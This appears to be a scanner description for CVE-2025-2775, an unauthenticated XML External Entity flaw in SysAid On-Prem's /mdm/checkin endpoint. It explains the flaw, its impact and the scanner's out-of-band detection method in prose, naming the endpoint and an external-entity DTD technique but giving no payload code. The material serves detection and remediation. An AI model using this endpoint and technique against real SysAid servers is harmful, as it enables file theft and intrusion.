CVE-2025-2775 Scanner

SysAid On-Prem is an IT service management (ITSM) platform used by enterprises to manage IT operations, support tickets, and asset management. It is commonly deployed by mid-sized to large organizations across various sectors including education, healthcare, finance, and government. System administrators and helpdesk teams use SysAid On-Prem to streamline support tasks and maintain visibility over IT infrastructure. The platform offers features such as ticketing, CMDB, and remote control, making it a central tool in IT workflows. The on-premises version provides added control for organizations with strict data security policies. SysAid’s flexibility and integrations have made it a popular choice for managing IT services efficiently.

This scanner detects an unauthenticated XML External Entity (XXE) vulnerability in the SysAid On-Prem software. The flaw resides in the /mdm/checkin endpoint, which inadequately handles XML input, allowing external entities to be processed. This can lead to critical impacts such as arbitrary file read or even remote code execution under specific conditions. Since no authentication is required to exploit this endpoint, attackers can remotely exploit it without credentials. Exploiting this vulnerability may result in severe data breaches or unauthorized access to administrative functionalities. The vulnerability is classified as critical due to its wide impact and low complexity of exploitation.

The scanner interacts with the /mdm/checkin HTTP endpoint of the SysAid On-Prem server by submitting specially crafted XML payloads. The payload includes a DOCTYPE declaration with an external entity pointing to an attacker-controlled DTD file. When parsed, this causes the server to make an outbound request, confirming the vulnerability through interaction detection. The scanner uses an out-of-band (OAST) technique to verify successful exploitation by checking for HTTP callbacks. The “User-Agent: Java” marker and HTTP protocol usage in the callback confirm the vulnerable behavior. This approach provides reliable detection of the XXE flaw in real-world deployments.

If exploited, the vulnerability can allow attackers to read sensitive local files from the server hosting SysAid On-Prem. Moreover, it could potentially be leveraged to exfiltrate server configurations, credentials, or other sensitive data. In some cases, attackers may escalate access to gain administrative privileges or take control of the ITSM environment. Unauthorized access to administrative accounts can lead to modification of ticket records, deletion of logs, or pivoting into other parts of the internal network. The consequences of exploitation include data loss, service disruption, and regulatory non-compliance. Swift remediation is critical to mitigate these risks.

REFERENCES

• https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
• https://documentation.sysaid.com/docs/24-40-60